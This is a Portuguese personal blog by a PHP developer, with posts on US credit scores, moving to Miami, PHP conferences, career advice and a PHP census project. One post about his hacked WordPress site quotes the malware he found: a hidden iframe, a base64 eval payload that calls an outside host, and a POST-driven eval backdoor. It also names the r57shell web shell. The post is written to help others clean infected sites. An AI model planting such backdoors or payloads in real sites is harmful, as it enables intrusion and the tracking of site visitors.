Skip to content


Feliz Ano Novo!

Uma pausa entre os posts com texto para meu vídeo dos fogos no Bayfront Park em Miami.

(Povo aqui gosta de gritar :)

Posted in Português.


Credit Score

(Nota: o que estou postando aqui é o que tenho aprendido até então. Isto não significa que aprendi tudo a respeito de todas as situações que descrevo, pois estou nos EUA há apenas 2 meses. Portanto, lembre-se que eu posso estar enganado em algum item e vou descobrir mais tarde. Utilize as informações aqui como base, mas procure outras fontes de informação.)

Credit Score, ou pontuação de crédito, é o grande dilema de quem inicia uma nova vida nos Estados Unidos.
Aqui eles mantém um histórico dos teus empréstimos e de quão bom pagador você é. Isto gera uma pontuação, a credit score, e são baseados nela que as empresas/bancos onde você está buscando empréstimo ou financiamento sabem se você é um bom pagador ou não, assim definindo a taxa de juros que vão te cobrar.

De forma bem simples, a credit score se resume em três tipos:

  • Good credit: você é um bom pagador (paga todas as suas contas em dia).
  • Bad credit: você é um mal pagador (não paga em dia).
  • No credit history: você não tem histórico de crédito (meu caso).

Vale lembrar que só tem histórico de crédito quem tem dívidas. Ou seja, se o sujeito sempre comprou tudo à vista, é muito provável que ele não tenha histórico de crédito.
Não vou me aprofundar sobre credit score neste post. Você pode encontrar mais informações aqui: http://en.wikipedia.org/wiki/Credit_score#United_States

Credit Score e meu (futuro) primeiro carro nos EUA

Ainda não comprei um carro aqui, pois estava focando no apartamento e gastos com o aluguel do mesmo (mais sobre o apartamento no próximo post), mas como já fui me informar sobre como funciona, vou utilizar isto como exemplo.
Basicamente, como não tenho histórico de crédito, minhas opções imediatas para comprar um carro são:

  • Pagar à vista
  • Dar 50% de entrada
  • Convencer algum conhecido a fazer o que eles chamam aqui de co-sign, ou seja, um fiador que tenha bom histórico de crédito e que daria a garantia sobre o empréstimo/financiamento.

Pagar à vista é uma boa alternativa se você tem o dinheiro, claro, e não quer ter parcelas mensais. Mas para quem está iniciando a vida aqui, eu não recomendo, pois isto não vai contar em nada para a sua credit score.

Dar 50% de entrada é a alternativa mais viável. Mesmo se você não tem muita grana disponível de imediato, compre um carro mais barato desta forma e as prestações pagas em dias farão bem à sua credit score. Existem carros muito baratos nos EUA (usados, mais velhos, principalmente). Que tal um Jeep Grand-Cherokee ano 2001 por US$ 5,995.00, por exemplo?

Co-sign é uma excelente alternativa se você tem alguém em quem possa confiar e, mais importante ainda, que possa confiar em você. Aqui existe uma pequena diferença com relação ao Brasil: os credores podem ir atrás do fiador antes mesmo de ir atrás do devedor. Ou seja, se você deixar atrasar uma prestação sequer, o credor pode ir incomodar seu fiador. É bom ter bastante cautela se escolher este método, pois isto pode prejudicar o crédito do fiador.

Como mencionei antes, estas são as opções imediatas. Se você puder aguentar uns 6 meses sem carro, é melhor, pois você pode estabelecer seu crédito neste período.
A melhor maneira de fazer isto é indo até um banco e pedir um Secured Credit Card. Este é um cartão de crédito como os demais, mas você estabelece um limite mais baixo, cerca de US$300.00, por exemplo, e o pagamento (ou não pagamento) das faturas é reportado mensalmente às três maiores empresas de serviço de crédito: Experian, TransUnion e Equifax. Assim, mantendo os pagamentos em dia, sua credit score será estabelecida. Então você terá acesso a mais opções, como um bom pagador :)

Em um post futuro vou falar a respeito dos juros de financiamentos de veículos. Chegam a ser ridículos comparados aos do Brasil.

Abraço e até o próximo post!

Posted in Vida nos EUA.


Vida nos EUA

“A gente nunca esquece do que a gente é, mas a gente vive e o tempo que se tem é vida. O tempo agora é em outro lugar… a vida agora mudou.” – Tadeu Meyer


Desde meus tempos de criança, sempre tive vontade de conhecer os Estados Unidos.
Imaginava como seria assistir a uma partida da NBA dentro do ginásio… ver as casas que apareciam nos filmes… os carros… as famílias com os pais jogando baseball com seus filhos.

Devido a esta vontade, me dediquei desde cedo a aprender inglês. Infelizmente, na escola as aulas não passavam de verb to be a cada ano, pois ninguém mais se interessava em aprender.
Também não havia curso de inglês na minha cidade. É engraçado parar para pensar a respeito, mas eu nunca senti falta de um curso. Afinal, eu tinha um dicionário e vontade de aprender.
O dicionário foi meu companheiro de várias madrugadas em frente ao computador.
Adorava pegar letras de música para traduzir, aprender a pronúncia e melhorar meu vocabulário. Hábito que ainda mantenho.

Quando comecei a trabalhar percebi que esta dedicação valeu a pena. Não demorou muito para que oportunidades de finalmente conhecer a terra do tio Sam surgissem.

Hoje, já perdi as contas de quantas vezes já estive nos EUA. E estou muito feliz também por ter perdido as contas de quantos jogos da NBA já assisti dentro do ginásio :)

Desde a primeira visita, a vontade de morar nos states foi crescendo. Não gosto da ilegalidade, então busquei os caminhos legais para tornar esta vontade em realidade.
Quando comecei a trabalhar para a InPhonex, há 6 anos, acreditei que esta poderia ser a grande oportunidade. Arrisquei, me dediquei ao trabalho, dei o melhor de mim e… here I am!

Em outubro (2011) recebi meu visto H-1B e em novembro (2011) mudei para Miami, Florida.

Este é o primeiro post de uma série que pretendo manter contando as minhas experiências por aqui. Até então estava postando algumas coisas no facebook, mas muitos detalhes acabam ficando de fora.
E, desde que mudei pra cá, continuo usando o facebook diariamente pra manter contato com meus amigos e família. O problema é que com isso eu continuo vivenciando o que acontece no Brasil e não estou aproveitando ao máximo a oportunidade que tanto lutei para conquistar. Por isto, aproveitando que é final de ano, decidi que vou suspender minha conta no facebook assim que eu mudar para meu apartamento aqui (sim, ainda estou em hotel… assunto para outro post) ou o ano acabar. O que acontecer antes… e vai ser neste próximo fim de semana :)

A idéia do blog é para compartilhar as experiências e continuar mantendo meus amigos e família informados das minhas andanças. Tinha esta idéia já meio esquecida, mas conversar com o Tadeu há pouco era o incentivo que eu precisava. A frase no início do texto veio da nossa conversa no chat. O cara é um poeta.

Pois bem, stay tuned para mais posts sobre minhas aventuras por aqui.

Abraços!

Posted in Vida nos EUA.


#tek11 – Porque você deveria ir

Acabo de voltar de Chicago, após 2 dias de evento na php|tek11 . Teriam sido 3 dias, se eu não tivesse 3 voos cancelados e assim perdido o primeiro dia de evento. Mas isto é conteúdo para outro post.

Quero agradecer à InPhonex, provedora de serviços VoIP, onde trabalho, por ter patrocinado a minha ida. Estou trazendo muita informação e conteúdo para o nosso time de desenvolvimento.

Este foi meu primeiro evento internacional de PHP e sem dúvida não será o último.

Razões:

#1 Comunidade/Família

Cheguei no local do evento às 9:30 da manhã do dia 26 de maio, segundo dia de conferência. Peguei minha credencial, a agenda do evento e fiquei sabendo dos concursos que rolariam nos dias do evento. Entre eles o “Bingo dos Palestrantes”, onde você recebia duas cartelas com foto e nome de alguns dos palestrantes, e seu objetivo era ir até cada um destes palestrantes para que este carimbe ou assine sua cartela. Já deu pra sentir como seria o evento.
Elizabeth Naramore estava falando sobre “Comunidades Open Source” com muito entusiasmo e simpatia, apesar de ter chego 30 minutos antes do início da palestra devido a problemas com voos também. Todos adoraram a palestra!
Em um intervalo vi alguém pedindo que ela carimbasse a cartela, aproveitei a deixa para pedir também. Ela não só carimbou, mas perguntou também quem eu era. Quando eu me apresentei ela disse: “Ah, então você é o outro brasileiro que o Rafael Dohms estava falando” então me apresentou para a Lorna Jane Mitchell que estava junto a ela, ambas muito queridas.
Esta primeira experiência se repetiu com cada um dos palestrantes ou organizadores do evento com quem conversei. TODOS muito abertos e receptivos, o que para mim foi sensacional.
O sentimento é que todos ali fazem parte de uma grande família.

#2 Contato com pessoas que fazem a diferença

Os conteúdos das palestras foram excelentes, mas mais que isto, a interação com as outras pessoas é algo que não tem preço. A oportunidade de extender o conteúdo da palestra, com o próprio palestrante, discutindo a sua realidade dentro da sua empresa, é ótima.
E você não está falando com uma pessoa qualquer. São pessoas que trabalham em empresas e projetos como: php|architect, Zend, Adobe, SourceForge, Microsoft, Oracle, WordPress, xdebug, pear, node.js, couchDB e muitos outros.

#3 Conteúdo

Não vou falar dos conteúdos das palestras, pois este post ficaria muito extenso. Adianto apenas que o conteúdo é essencial para empresas e profissionais que querem atingir o próximo nível.
Então de uma olhada aqui: http://joind.in/event/view/679 neste link você vai encontrar os slides para todas as palestras assim como o feedback do público.

#4 Hack-a-thon

Na noite do dia 26 de maio foi realizado o Hack-a-Thon. Uma noite para por a mão na massa. Haviam vários projetos com seus representantes e os participantes poderiam escolher qual projeto contribuir e tentar desenvolver algo, ou ajudar resolver bugs, enfim… para trocar idéias de forma prática. Mais informações aqui. Gostei muito do modelo e creio que devemos acrescentar nos nossos eventos também. É diferente dos mini-cursos pois é algo mais aberto e bidirecional. Também nesta noite foi organizado um PHP Test Fest pelo brazuca Rafael Dohms, trabalho que foi elogiado.

#5 Portas Abertas

Existem muitas oportunidades de emprego nestes eventos. Várias empresas procurando profissionais.
Além disso, existe muita oportunidade para networking, o que eventualmente pode se tornar uma oportunidade de emprego no futuro.

E para finalizar…

Quero agradecer e MUITO, em meu nome e em nome de toda a comunidade PHPSC também, ao Rafael Dohms, pelo excelente trabalho que ele está fazendo na comunidade PHP brasileira e também nos representando em eventos como este.
Sem dúvida alguma o pessoal lá fora gosta demais dele e o respeitam muito. Respeito este que falta de muitas pessoas que fazem parte da nossa comunidade.
A todos aqueles que criticam o Rafael, gostaria de pedir que vocês parem e pensem o que estão fazendo pela comunidade ou mercado de trabalho, antes de sair atirando pedras.
Rafael está abrindo portas enormes para nós e quem não está vendo isso ainda, precisa prestar mais atenção.
Infelizmente perdi a apresentação da sua palestra por causa dos voos cancelados, mas o feedback foi ótimo: http://joind.in/talk/view/3417

Enfim, esta é minha recomendação para todos que tiverem uma oportunidade de ir em um evento como este, especialmente a php|tek, vão! Vale cada minuto!

Um abraço!

Posted in PHP, Português.


“Como ser um bom profissional de TI”: Minhas Contribuições

Este post na verdade era para ser um comentário no blog do meu amigo Elton Minetto. Antes de ler o que eu escrevi, leia o post dele: http://www.eltonminetto.net/como-ser-um-bom-profissional-de-ti.htm

Comecei a escrever meu comentário e rapidamente notei que o que eu tinha pra falar não servia para um simples comentário. Aproveitei então a oportunidade de criar vergonha na cara e atualizar meu blog com este “post-resposta”.

Segue então o que escrevi ao Elton:

Excelente post, Elton!
Minha experiência nos meus 10 anos na mesma área me leva às mesmas conclusões.

Minhas contribuições aos tópicos:

Estude e aperfeiçoe-se

Apenas um comentário. Se seu leitor optar por fazer uma faculdade: lembre-se de que o propósito deste período de estudo serve para você entrar em um mercado de trabalho. Onde as coisas são mais práticas e menos teóricas. Sugiro entrar no mercado de alguma forma, seja através dos outros tópicos citados nos posts, como participar em UGs, conferências, enfim. Estar em contato com profissionais da área ajuda bastante!

Aprenda inglês

Li o post do Guilherme no dia que ele postou e também concordo. Eu nunca fiz curso de inglês e hoje sou Diretor de Tecnologia de uma empresa americana. Estou neste momento em Miami. Se eu não soubesse inglês não teria tantas oportunidades.

Mantenha o networking

Eu creio que Networking é ESSENCIAL. Networking abre portas! As vezes onde você nem imagina que existiria uma.

Vá a conferências e eventos

Concordo plenamente. Ajuda a exercitar e aumentar seu networking.

Não se apaixone por uma tecnologia

Usando uma comparação simples, existe uma razão pela qual um lenhador utiliza um machado ao invés de uma faca. Mesma analogia se aplica neste contexto.

Aprenda outras áreas

Perfeito também. Abra a mente para outras áreas. Conheça pessoas de outros setores da empresa. Este conhecimento vai te trazer mais networking e acredite em mim: portas maiores podem se abrir através de contatos que não são da sua área.

Tenha um blog/site

Aconselho também. Conheci muitas pessoas através de blogs que criei.

Pratique sempre

Outra máxima: “a prática leva à perfeição”

Leia muito

Concordo, apesar de que eu poderia ler mais do que leio :) Ler ajuda também a aprender a escrever as palavras corretamente, o que me parece que falta a muita gente.

Colabore

Eu aprendi muito do que sei hoje colaborando com outras pessoas. Eu passava HORAS por dia em canais de IRC relacionados à web ajudando outras pessoas. Adorava quando alguém aparecia com um problema que eu não sabia a resposta, pois era a minha grande oportunidade de buscar este conhecimento para poder então ajudar. E assim não só consegui aprender muitas coisas, como também conheci muitas pessoas. Até alguns que na época eram adolescentes e hojes são colegas de profissão, muitos dos quais tive a oportunidade de conhecer pessoalmente e manter contato.

Participe de algum GU

Como membro do PHPSC, sou suspeito para falar. Mas eu acredito que se todos os profissionais participassem de GU’s relacionados as suas áreas de atuação, o mercado de trabalho seria muito, mas muito melhor.

Quero adicionar um tópico:
Saia da sua zona de conforto
Não tenha medo de arriscar quando alguma oportunidade bater em sua porta. Especialmente se você tiver que sair da sua zona de conforto. Este é o grande motivo pelo qual algumas pessoas tem mais sucesso do que outras: elas arriscam. E isto me lembra de outra máxima, que não por acaso já pude sentir na pela várias vezes: quanto mais me empenho, mais sorte eu tenho.

Quando você correr riscos, se empenhar, sair da sua zona de conforto por várias vezes e enfim ter sucesso, vai ser comum as pessoas olharem para você e dizerem que você teve sorte… mas você se acostuma :)

Abraço Elton e parabéns pelo post.

Posted in Português.

Tagged with , .


Chamada de Trabalhos PHPSC Conf 2.0/2009 – Univali, Itajaí

O Grupo de Usuários de PHP do Estado de Santa Catarina está promovendo o evento em Itajaí – litoral do estado – em parceria com a Univali durante a Semana da Computação, nos dias 29 e 30 de Maio de 2009. E no dia 31 de Maio,  no mesmo local, será realizado o primeiro TestFest de PHP de Santa Catarina.

Para tanto, faz a chamada de trabalhos a palestrantes interessados em participar do evento, que deverão enviar suas propostas até o dia 30/04/2008. Os trabalhos deverão se encaixar em uma das duas categorias disponíveis para o evento: mini-cursos ou palestras. Se a proposta enviada for uma palestra, esta deverá ter duração de no mínimo 1 hora e no máximo 1h30.  Se mini-curso, duração mínima de 3h30 e máxima 4h.

Os assuntos para o evento deste ano foram expandidos, contemplando as seguintes áreas:

- PHP (Frameworks, melhores práticas de desenvolvimento (OO, uso do PHPUnit etc), PHP básico, IDEs para PHP, Banco de Dados e PHP entre outros assuntos);
- Cases de empresas que usaram PHP como solução tecnológica;
- Desenvolvimento ágil Scrum, XP e outras metodologias co-relacionadas;
- Rich Internet (RIA), Jquery, Prototype, Flex, Javascript, CSS;
- Iniciando no desenvolvimento Web (assuntos que envolvam PHP, JavaScript, Design e por onde começar);
- Integração de PHP com outras plataformas e linguagens;
- Como contribuir com a comunidade e como ajudar a corrigir e melhorar o PHP;

Caso a sua proposta se encaixe em um dos temas relatados envie as seguintes informações.

A seguir modelo de proposta a ser enviado:

Nome do palestrante: Fulano
Título da palestra: PHP e Oracle
Nível: Intermediário
Resumo da palestra: A palestra tem como objetivo demonstrar a utilização do banco de dados Oracle com a linguagem PHP. Também será demonstrado dicas de performance específicas na utilizaçãodeste banco. Adicionalmente serão apresentada as novidades que foram adicionadas ao Oracle 11g e como estas novidades afetam o PHP.
Minicurriculo do palestrante: Fulano possui graduação em Ciência de Computação pela universidade X e especialização em Ciência da Computação pela Y. Atualmente é Analista de Sistemas da empresa W e Professor da faculdade Z, ministrando disciplinas de Programação, Segurança, Sistemas Distribuídos, entre outras.
Categoria: Palestra
Duração: 1:15
Currículo: Contendo informações adicionais e se já palestrou em algum evento do gênero.

As propostas devem ser enviadas para conf @ phpsc.com.br.

Maiores informações serão divulgadas durante o[s] meses de Abril/Maio no site do grupo e na lista do Yahoo http://br.groups.yahoo.com/group/php-santacatarina

Posted in PHP, Português.


Censo Nacional de PHP e PHP Counter

Hoje vou lhes contar brevemente como surgiu a idéia do PHP Counter, porém contando a minha versão até onde iniciou a parceria com o Er Galvão.

Eu trabalho profissionalmente com PHP desde 2001, e ao longo destes anos fui identificando algumas tendências e preocupações entre os profissionais que também utilizam o PHP.
Em 2006 escrevi um artigo no PHPBrasil.com, que teve muito sucesso e interesse: http://www.phpbrasil.com/articles/article.php/id/1286, falando de uma forma subjetiva em como eu via a situação do nosso mercado.

O artigo se espalhou por vários sites e inclusive trouxe muitos visitantes para o meu blog: http://www.silvano.pro.br/2006/07/09/quanto-vale-um-programador-php/

Porém, eu considero meu artigo bastante incompleto, porque não mostra objetivamente a situação do mercado. Muitas pessoas notaram isto e perguntaram nos comentários, e então comecei a pensar em como conseguir estes dados para que eu pudesse escrever um novo artigo, mostrando a realidade com números.

Eis que surgiu então a idéia de criar um Censo Nacional de PHP, buscando a participação do maior número possível dos profissionais da área. Mas isto aconteceu há três anos e desde então eu procurava tempo e disposição para colocar o projeto em prática.

Há dois anos me tornei Gerente de Desenvolvimento de Aplicações da InPhonex, e quando abríamos vagas para novos desenvolvedores a minha preocupação se agravava ainda mais. Era, e ainda é, muito difícil encontrar profissionais que utilizam PHP com qualidade. Isto me levou a agregar mais idéias à idéia do Censo. Os dados do Censo agora não serviriam apenas para mostrar a realidade do mercado. Estes dados poderiam ser utilizados em parceria com os grupos de usuários e empresas para capacitar mais profissionais! Pois sabendo quais as deficiências de cada região, os grupos locais podem atuar nestas deficiências e reverter o quadro.

Em 2007, em uma conversa com o Galvão, expus esta minha idéia e ele também me revelou outra, a de criar um registro de profissionais no estilo “Linux Registered Users”. Então pensamos: que tal unir as duas idéias em uma só? E assim começamos :)

De 2007 pra cá, vimos utilizando os curtos períodos de tempo para discutir o projeto e tentar criar um sistema que fosse interessante para o público alvo. 2 anos se passaram e finalmente resolvemos realizar um pré-lançamento, que aconteceu no dia 6 de abril de 2009, e marcar uma data para o lançamento oficial do projeto, que acontecerá durante a PHP Conf.

Como sou um dos coordenadores do grupo PHP SC, participo também do grupo PHP Brasil Comunidades. Lá divulguei este nosso projeto e busquei o apoio dos demais Grupos de Usuários do páis. O apoio foi unânime! O que, aliás, me deixou muito feliz. Só tenho a agradecer aos meus colegas de profissão!

Menos de uma semana se passou e o projeto tem se mostrado muito bem aceito.

Se você ainda não participou, participe! http://www.phpcounter.org

E se possível, ajude a divulgar :)

Muito obrigado a todos que estão contribuindo com este projeto e direta ou indiretamente com o crescimento do mercado PHP no Brasil!

Posted in Português, Projetos.

Tagged with , , , , , , .


Recomeço…

Há alguns dias, notei algumas diferenças com relação ao meu blog e principalmente no meu pagerank, que antes era de modestos 4/10.

Antes, quando você entrava no google.com.br e digitava “programador php”, meu site era o primeiro da lista. De tempos em tempos costumo verificar se esta situação se mantem e na minha última tentativa, espanto! Meu blog simplesmente sumiu do google!
Chequei meu pagerank e outro susto: estava zerado!

O que diabos estava acontecendo?

Então comecei a checar os códigos do wordpress e encontrei alguns, problemas:

1 – havia um iframe no final das minhas páginas:

<iframe src=”http:// google – stat .com /tomi/?t=2″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
(coloquei os espaços no domímio porque não quero gerar mais tráfego para este indivíduo)

Para remover: se você tem acesso SSH ao seu servidor, você pode remover este iframe de todas as páginas com o comando:

find ./* -type f -exec sed -i 's/<iframe src="http:\/\/google - stat.com\/tomi\/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
(remova os espaços no domínio)

Ao entrar no meu blog, aparecia um PDF para fazer download. WTF?! Era culpa deste iframe, que injetava um vírus no documento.

2 – o .htaccess foi modificado

Meu .htaccess foi modificado. Quando qualquer bot de engine de busca acessava meu site, ele era automaticamente redirecionado para outro site. Fiquei tão P* que deletei e não tenho aqui o conteúdo do .htaccess

3 – havia um código php malicioso no index.php que gerava links aleatórios para outros sites.

eval(base64_decode(‘JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs=’));

O resultado do decode é este:

$ch=curl_init(“http://usr-52. adsl .md/inc2.php?host=”.urlencode($_SERVER["HTTP_HOST"]).”&ip=”.urlencode($_SERVER["REMOTE_ADDR"]).”&agent=”.urlencode($_SERVER["HTTP_USER_AGENT"])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;

4 – em diversas páginas encontrei mais códigos maliciosos que poderiam executar qualquer coisa enviada pelo indivíduo que fez isso em meu blog.

Eis aqui como ele se parece:

<?php if($_GET['9e26465b24966559']==”a2bc87015a3f0dc6″){ eval(base64_decode($_POST['file'])); exit; } ?>

Este trecho do código aparece em muitas páginas e o nome e valor da variável $_GET sempre muda.

Faça uma busca nos seus códigos por eval(base64_decode e se encontrar algo, remova imediatamente.

5 – havia um arquivo wp-content/cache.php

Este arquivo era simplesmente uma shell escrita em php, chamada r57shell
Busque este arquivo ou o nome desta shell e se encontrar… é meu querido… bem vindo ao clube.

É bem provável que outras coisas tenham sido adicionadas, então eu decidi limpar tudo e reinstalar o WP, porém agora com a última versão.

Ainda não sei como este cara teve acesso, mas provavelmente foi alguma vulnerabilidade no WP ou algum plugin que eu estava utilizando.
(mas ainda tenho dúvidas se não foi algo com a dreamhost, pois eles mudaram meus sites de servidor recentemente)

Se você utiliza wordpress, recomendo que utilize este plugin: http://wordpress.org/extend/plugins/exploit-scanner/

Enfim… o que me resta agora é tentar recuperar meu pagerank.

Abraço!

Posted in Português.

Tagged with , , .


PHP Counter – Pré Lançamento

É com muito orgulho que lhes apresento meu projeto em parceria com Er Galvão: PHP Counter

O Projeto

O objetivo do projeto é ser uma referência para o mercado PHP mundial, fornecendo dados estatísticos que propiciarão a análise e evolução do mercado através da atuação em conjunto com grupos de usuários, empresas e profissionais.

Periodicamente serão realizados censos buscando que os profissionais façam seus cadastros ou os atualizem para que os dados sempre mostrem a realidade atual. Disponibilizaremos ferramentas para que os grupos de usuários possam ter acesso aos dados.

É importante frisar que em nenhum momento do projeto os dados preenchidos pelos usuários serão atrelados à qualquer forma de identificação. Informações como nome, número de registro, e-mail ou qualquer outra forma de identificação não serão disponibilizados para visualização nos resultados do censo.

Pré-lançamento

Estamos realizando um pré-lançamento desta iniciativa no Brasil visando a obtenção de dados para o lançamento oficial que será realizado durante a PHP Conference Brasil ’09.

No lançamento oficial, onde a iniciativa será extendida à outros países, cada usuário que participou do censo será contemplado com um número de registro, à exemplo de iniciativas similares, como “Linux Counter” e “Ubuntu Counter”. Usuários que aderirem ao censo após o lançamento oficial receberão seus números de registro automaticamente através da ferramenta disponível no site.

Participe!

Clique aqui para acessar o formulário e fazer seu cadastro! Faça parte do projeto e dê sua contribuição para o crescimento desta que é uma das linguagens mais utilizadas no mundo!

Posted in PHP, Português.


Primeiro PHP TestFest de Santa Catarina

PHP TestFestNos dias 29 e 30 de maio o grupo PHPSC vai promover o segundo PHPSC Conf que acontecerá no campus da Univali de Itajaí.
Estamos trabalhando nos preparativos e em breve traremos maiores informações como a grade de palestras, mini-cursos, hotéis, caravanas e etc.
Aguardem pois teremos novidades!

Para aproveitar a estrutura oferecida pela Univali e trazer este projeto para Santa Catarina, estaremos também promovendo o nosso primeiro PHP TestFest, como podem ver aqui: http://wiki.php.net/qa/testfest e que será realizado no dia 31 de maio, seguido de um PHPinga!
Mais informações sobre o TestFest estão disponíveis aqui: http://qa.php.net/testfest.php

Precisamos saber quantas pessoas vão participar, pois temos que preparar a estrutura para vocês!

Os interessados por gentileza façam seu cadastro aqui: http://spreadsheets.google.com/viewform?hl=pt-BR&formkey=cGJUYS1ESkxzZ1F0ZFZ1R29vZjMzZUE6MA..

Obrigado a todos!

Posted in PHP, Português.